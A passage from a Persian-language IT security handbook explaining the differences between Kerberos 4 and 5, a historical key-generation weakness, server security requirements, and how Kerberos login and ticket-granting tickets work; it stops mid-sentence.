‫‪ Kerberos 4‬ﺍﺯ ‪ Kerberos 5‬ﻛﺎﺭﺁﻣﺪﺗﺮ ﺍﻣﺎ ﻣﺤﺪﻭﺩﺗﺮ ﺍﺳﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ‪ Kerberos 4‬ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺷﺒﻜﻪﻫﺎﻱ ‪TCP/IP‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻛﺎﺭ ﻛﻨﺪ‪ ،‬ﭼﻨﺪ ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺍﺭﺗﻘﺎ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ‪ ،‬ﻭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻗـﺪﻳﻤﻲ ﻣﺤـﺴﻮﺏ ﻣـﻲﺷـﻮﺩ‪ .‬ﺩﺭ ﺍﻭﺍﻳـﻞ ﺳـﺎﻝ ‪ ۱۹۹۶‬ﻓـﺎﺭﻍﺍﻟﺘﺤـﺼﻴﻼﻥ‬
‫ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ‪) COAST‬ﮐﻪ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۸‬ﺑﺎ ﻣﺮﮐﺰ ﺗﺤﻘﻴﻘﺎﺗﻲ ‪ CERIAS‬ﺍﺩﻏﺎﻡ ﺷﺪﻩ ﺍﺳﺖ( ﺩﺭ ﺩﺍﻧﺸﮕﺎﻩ ‪ Purdue‬ﻳـﻚ ﺿـﻌﻒ ﻋﻤﻴـﻖ ﺩﺭ ﻧﺤـﻮﺓ‬
‫ﺳﺎﺧﺘﻪﺷﺪﻥ ﻛﻠﻴﺪ ‪ Kerberos 4‬ﻛﺸﻒ ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﻪ ﻣﻬﺎﺟﻢ ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﻛﻠﻴﺪﻫﺎﻱ ﻧﺸﺴﺖ ﺭﺍ ﺩﺭ ﻋﺮﺽ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺣﺪﺱ ﺑﺰﻧﺪ‪ .‬ﻫﺮﭼﻨﺪ‬
‫ﺑﺮﺍﻱ ﺍﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻳﻚ ﺍﺻﻼﺡ ﺑﺼﻮﺭﺕ ﮔﺴﺘﺮﺩﻩ ﺗﻮﺯﻳﻊ ﺷﺪ‪ ،‬ﺍﻣﺎ ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ‪ Kerberos 4‬ﺩﺭ ﺑﺮﺍﺑﺮ‬
‫ﺣﻤﻼﺕ ﺳﺮﺭﻳﺰﻱ ‪ buffer‬ﻫﻢ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ ﻭ ﻫﻴﭻ ﺍﺻﻼﺣﻲ ﻧﻴﺰ ﺑﺮﺍﻳﺸﺎﻥ ﺍﺭﺍﺋﻪ ﻧﺸﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪ Kerberos 5‬ﻣﺸﻜﻼﺕ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﭘﺮﻭﺗﻜﻞ ‪ Kerberos‬ﺭﺍ ﺭﻓﻊ ﻛﺮﺩ ﻭ ﺁﻧـﺮﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺣﻤـﻼﺕ ﻣﻌﻤـﻮﻝ ﺷـﺒﻜﻪ ﻣﻘـﺎﻭﻣﺘﺮ ﺳـﺎﺧﺖ‪.‬‬
‫‪ Kerberos 5‬ﻫﻤﭽﻨﻴﻦ ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮﺗﺮ ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺷﺒﻜﻪ ﻛﺎﺭ ﻛﻨﺪ‪ Kerberos 5 .‬ﻫﻤﭽﻨﻴﻦ ﭘﻴﺶﺑﻴﻨﻲﻫﺎﻳﻲ ﺑـﺮﺍﻱ‬
‫ﻛﺎﺭ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻏﻴﺮ ‪ DES‬ﺩﺍﺭﺩ‪ .‬ﺍﮔﺮﭼﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﻲ ﻣﺜﻞ ‪ DES‬ﺳﻪﮔﺎﻧﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ﭼﻨـﺪﺍﻥ‬
‫ﮔﺴﺘﺮﺩﻩ ﻧﻴﺴﺖ‪ ،‬ﺑﻴﺸﺘﺮ ﺑﻪ ﺩﻟﻴﻞ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻗﺪﻳﻤﻲ ﻛﻪ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩﺍﻧﺪ‪.‬‬

‫‪171 Massachusetts Institute of Technology‬‬


‫‪172 Timesharing‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٣٨‬‬

‫ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ‪ Kerberos 5‬ﭼﻨﺪ ﻗﺎﺑﻠﻴﺖ ﺟﺪﻳﺪ ﻧﻴﺰ ﺩﺍﺭﺩ‪ :‬ﺍﻣﻜﺎﻥ ﺗﻔﻮﻳﺾ ﺷﺪﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﺑﻠﻴﻄﻬﺎﻳﻲ ﺑﺎ ﺯﻣﺎﻥ ﺍﻧﻘـﻀﺎﻱ ﺑـﻴﺶ ﺍﺯ‬
‫‪ ۲۱‬ﺳﺎﻋﺖ‪ ،‬ﺑﻠﻴﻄﻬﺎﻱ ﺗﺠﺪﻳﺪ ﭘﺬﻳﺮ‪ ،‬ﺑﻠﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺯﻣﺎﻧﻲ ﺩﺭ ﺁﻳﻨﺪﻩ ﻓﻌﺎﻝ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﮔﺰﻳﻨـﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﺩﻳﮕـﺮ‪ .‬ﭼﻨﺎﻧﭽـﻪ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﺍﺯ‬
‫‪ Kerberos‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ‪ Kerberos 5‬ﺭﺍ ﺑﻜﺎﺭ ﺑﺒﺮﻳﺪ‪ IETF.‬ﺭﻭﻱ ﺑﺎﺯﻧﮕﺮﻱ ﻭ ﺗـﺸﺮﻳﺢ ‪ RFC‬ﺷـﻤﺎﺭﺓ ‪ - ۱۵۱۰‬ﻛـﻪ‬
‫‪ Kerberos 5‬ﺭﺍ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﺪ ‪ -‬ﻛﺎﺭ ﻛﺮﺩﻩ ﻭ ﭼﻨﺪ ﺗﻮﺳﻌﺔ ﻗﺎﺑﻞ ﺍﻧﺘﻈﺎﺭ ﺑﺮﺍﻱ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﭘﻴﺸﻨﻬﺎﺩ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬

‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪Kerberos‬‬

‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ‪ Kerberos‬ﺗﻤﺎﻣﹰﺎ ﺑﺮ ﺍﺳﺎﺱ ﺩﺍﻧﺴﺘﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﻪ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ Kerberos‬ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﺮﺧﻼﻑ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ‪ Unix‬ﻛﻪ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻳﻜﻄﺮﻓﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺭﻣﺰ ﻋﺒﻮﺭ ‪ Kerberos‬ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺫﺧﻴﺮﻩ ﻭ ﺑﺎ ﻳـﻚ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ﻣﺘﺪﺍﻭﻝ ‪ -‬ﺩﺭ ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ ‪ - DES‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﻟﺬﺍ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﺷـﻮﺩ‪.‬‬
‫ﻛﺎﺭﺑﺮ ﻧﻴﺰ ﺑﺎ ﺍﺛﺒﺎﺕ ﺁﮔﺎﻫﻲ ﺧﻮﺩ ﺍﺯ ﻛﻠﻴﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ‪ ،‬ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺗﺼﺪﻳﻖ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺍﻳﻦ ﺣﻘﻴﻘﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺑﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺸﺎﻳﻲﺷﺪﺓ ﻛﺎﺭﺑﺮ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ ﻧﺘﻴﺠـﺔ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ‪ Kerberos‬ﺍﺯ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﺪ‪ ١٧٣.‬ﺍﻳﻦ ﻳﻚ ﻋﻴﺐ ﺟـﺪﻱ ﺳﻴـﺴﺘﻢ ‪ Kerberos‬ﺍﺳـﺖ‪ .‬ﻣﻌﻨـﻲ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻢ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺑﺎﺷﺪ ﻭ ﻫﻢ "ﺍﻳﻤﻨﻲ ﻣﺤﺎﺳﺒﺎﺗﻲ" ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺍﻳﻤـﻦ‬
‫ﺑﺎﺷﺪ ﺗﺎ ﺍﺯ ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭ ﺍﻓﺸﺎﻱ ﻫﻤﺔ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺟﻠﻮﮔﻴﺮﻱ ﺷﻮﺩ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎﻳﺪ ﻧـﺴﺒﺖ ﺑـﻪ ﺣﻤـﻼﺕ‬
‫ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﻳﻤﻦ ﺑﺎﺷﺪ‪ ،‬ﭼﺮﺍﮐﻪ ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﻭﺍﺭﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺷﻮﺩ ﻭ ﺩﺳﺘﺮﺳﻲ "‪ "root‬ﭘﻴﺪﺍ ﻛﻨﺪ‪ ،‬ﺑـﺎﺯ ﻫـﻢ ﻣـﻲﺗﻮﺍﻧـﺪ ﻫﻤـﺔ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﺪﺯﺩﺩ‪.‬‬
‫‪ Kerberos‬ﺑﮕﻮﻧﻪﺍﻱ ﻃﺮﺍﺣﻲ ﺷﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺁﻥ ﺑﺘﻮﺍﻧﺪ ﻣﺴﺘﻘﻞ ﺍﺯ ﺣﺎﻟﺖ ﺑﺎﺷﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﻓﻘـﻂ ﺑـﻪ ﺗﻘﺎﺿـﺎﻫﺎﻱ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﭘﺎﺳﺦ ﻣﻲﺩﻫﺪ ﻭ ﻫﺮﮔﺎﻩ ﻻﺯﻡ ﺑﻮﺩ ﺑﻠﻴﻂ ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﺍﻳﺠﺎﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺗﻜﺮﺍﺭ ﻭ ﺛﺎﻧﻮﻳﻪ ‪ -‬ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﻧﺒﻮﺩﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻـﻠﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺗﻘﺎﺿـﺎﻫﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﭘﺎﺳـﺦ ﺩﻫﻨـﺪ ‪ -‬ﺭﺍ ﻧـﺴﺒﺘﹰﺎ ﺁﺳـﺎﻥ ﻣـﻲﻛﻨـﺪ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺍﻳـﻦ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﻧﻴﺎﺯ ﺑﻪ ﻧﺴﺨﻪﻫﺎﻱ ﻛﺎﻣﻠﻲ ﺍﺯ ﺗﻤﺎﻡ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ ‪ Kerberos‬ﺩﺍﺭﻧﺪ‪ ،‬ﻛﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛـﻪ‬
‫ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﻫﻢ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﻭ ﻫﻢ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺍﻳﻤﻦ ﺑﺎﺷﻨﺪ‪.‬‬

‫ﻭﺭﻭﺩ ﺍﻭﻟﻴﻪ ﺑﻪ ﺳﻴﺴﺘﻢ‬


‫ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ‪ ،‬ﻭﺭﻭﺩ ﺑﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﻪ ﺍﺯ ‪ Kerberos‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻣﺸﺎﺑﻪ ﻭﺭﻭﺩ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﻋﺎﺩﻱ ﺍﺳﺖ؛ ﻳﻌﻨـﻲ ﻧـﺎﻡ‬
‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺗﺎﻳﭗ ﻣﻲﻛﻨﺪ ﻭ ﺍﮔﺮ ﺻﺤﻴﺢ ﺑﻮﺩﻧﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻣﻲﺷﻮﺩ ﻭ ﻛﺎﺭﺑﺮ ﭘﺲ ﺍﺯ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺑـﻪ ﻓﺎﻳﻠﻬـﺎ‪ ،‬ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﭘﺮﻳﻨﺘﺮﻫﺎ‪ ،‬ﻭ ﺳﺎﻳﺮ ﻣﻨﺎﺑﻊ ﻣﺸﺎﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪.‬‬
‫ﺍﻟﺒﺘﻪ ﺁﻧﭽﻪ ﺩﺭ ﭘﺲ ﭘﺮﺩﻩ ﺭﺥ ﻣﻲﺩﻫﺪ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺳﺖ‪ .‬ﻭﻗﺘﻲ ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ‪ - ١٧٤sshd -‬ﻳـﺎ ﻛﺘﺎﺑﺨﺎﻧـﺔ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ -‬ﻣﺜﻞ ‪) - PAM‬ﻳﺎ ﻳﻚ ‪ daemon‬ﺩﻳﮕﺮ ﺷﺒﻜﻪ( ‪ Kerberos‬ﺭﺍ ﻣﻲﺷﻨﺎﺳﺪ‪ ،‬ﺍﺯ ﺳﻴﺴﺘﻢ ‪ Kerberos‬ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﻛﺎﺭﺑﺮ ﺑﻬﺮﻩ ﻣﻲﺑﺮﺩ‪.‬‬

‫‪ ۱۷۳‬ﭼﻮﻥ ﺯﻣﺎﻧﻴﻜﻪ ‪ kerberos‬ﺗﻮﻟﻴﺪ ﺷﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻫﻤﭽﻨﺎﻥ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻗﺎﻧﻮﻥ ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨﻮﻱ ﺑـﻮﺩ‪ ،‬ﺍﺯ ﺁﻥ ﺩﺭ ‪ kerberos‬ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﺷـﻮﺩ‪ .‬ﻳـﻚ‬
‫ﭘﻴﺸﻨﻬﺎﺩ ﺍﻭﻟﻴﻪ ﺍﺯ ﻃﺮﻑ ‪ IETF‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻌﻨﻮﺍﻥ "ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺁﻏﺎﺯﻳﻦ ﺩﺭ ‪ "kerberos‬ﻣﻌﺮﻓﻲ ﺷﺪﻩ‪ ،‬ﻭ ﺭﻭﺷـﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﺍﺩﻏـﺎﻡ‬
‫ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺎ ‪ kerberos‬ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﭘﻴﺸﻨﻬﺎﺩ ﺑﻮﺳﻴﻠﺔ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪ ۱۷۴‬ﻭﺻﻠﻪﻫﺎﻱ ‪ OpenSSH‬ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ Kerberos 5‬ﺩﺭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪:‬‬
‫‪http://www.sxw.org.uk/computing/patches/openssh.html‬‬
‫ﻫﺮﭼﻨﺪ ﺩﺭ ﻛﻨﺎﺭ ‪ Kerberos 4‬ﺍﺯ ‪ SSH‬ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪﻩ‪ ،‬ﺍﻣﺎ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ ﻛﻪ ﺩﻭ ﺳﻴﺴﺘﻢ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻧﻲ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻛـﺮﺩ‪ .‬ﺧﻮﺷـﺒﺨﺘﺎﻧﻪ ﭘﺮﻭﺗﻜـﻞ‬
‫‪ SSH‬ﻧﮕﺎﺭﺵ ‪ ۲‬ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻻﻳﻪ ﺍﻣﻨﻴﺘﻲ ﻣﺸﺎﺑﻪ ‪ (GSSAPI) Kerberos 5‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ ،‬ﻛﻪ ﺑﺎﻋﺚ ﺳﺎﺩﻩ ﺷﺪﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﻣﺴﺎﺋﻞ ﻣﻲﺷﻮﺩ‪ .‬ﭘﻴﺸﻨﻬﺎﺩ ﺍﻭﻟﻴﺔ ﻣﺮﺑـﻮﻁ‬
‫ﺑﻪ ‪ IETF‬ﻛﻪ ﺍﺩﻏﺎﻡ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ‪.draft-ietf-secsh-gsskeyex‬‬
‫‪٣٣٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ‪ Kerberos‬ﺑﺎﻳﺪ ﺑﺪﺍﻧﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺭﺍ ﭼﮕﻮﻧﻪ ﭘﻴﺪﺍ ﻛﻨﺪ‪ ،‬ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻦ ﺍﻣﺮ ﻣﻲﺗـﻮﺍﻥ ﻫـﺮ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ )ﺑﻄﻮﺭ ﺳﻨﺘﻲ ﺩﺭ ﻓﺎﻳﻞ ‪ ،(krb5.conf‬ﻳﺎ ﻣﻲﺗـﻮﺍﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ‪ Kerberos‬ﺭﺍ ﺑـﺎ‬
‫ﺍﻗﻼﻡ ﺩﺍﺩﺓ ‪ DNS SRV‬ﺍﻋـﻼﻡ ﻋﻤـﻮﻣﻲ ﻧﻤـﻮﺩ‪ ،‬ﮐـﻪ ﺩﺭ ﺳـﻨﺪ ‪IETF Internet-Draft draft-ietf-krv-wg-krb-dns-locate‬‬
‫ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ‪ Kerberos 4‬ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﺮﺩﻳـﺪ‪ ،‬ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﭘﻴـﺎﻣﻲ ﺭﺍ ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫‪ Kerberos‬ﻣﻲﻓﺮﺳﺘﺪ‪ ١٧٥.‬ﺍﻳﻦ ﭘﻴﺎﻡ ﺣﺎﻭﻱ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎﺳﺖ ﻭ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺷـﻤﺎ ﺳـﻌﻲ ﺩﺍﺭﻳـﺪ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ ﺷـﻮﻳﺪ‪.‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺧﻮﺩ ﭘﺮﻭﻧﺪﺓ ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻭ ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺷـﻨﺎﺧﺘﻪ ﺷـﻮﻳﺪ‪،‬‬
‫ﻳﻚ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺑﺮﺍﻳﺘﺎﻥ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺎ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺳـﭙﺲ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﺍﺯ ﺷـﻤﺎ‬
‫ﻣﻲﺧﻮﺍﻫﺪ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺗﻼﺵ ﻣﻲﻛﻨﺪ ﺑﻠﻴﻂ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ ﺑـﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭﻱ ﻛـﻪ ﺷـﻤﺎ ﺍﺭﺍﺋـﻪ ﻛـﺮﺩﻩﺍﻳـﺪ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻧﻤﻲﻛﻨﺪ‪ ،‬ﻭ ﻣﻨﺤﺼﺮﹰﺍ ﺍﺯ ﺑﻠـﻴﻂ ﺗـﺼﺪﻳﻖ ﺑﻠـﻴﻂ‬
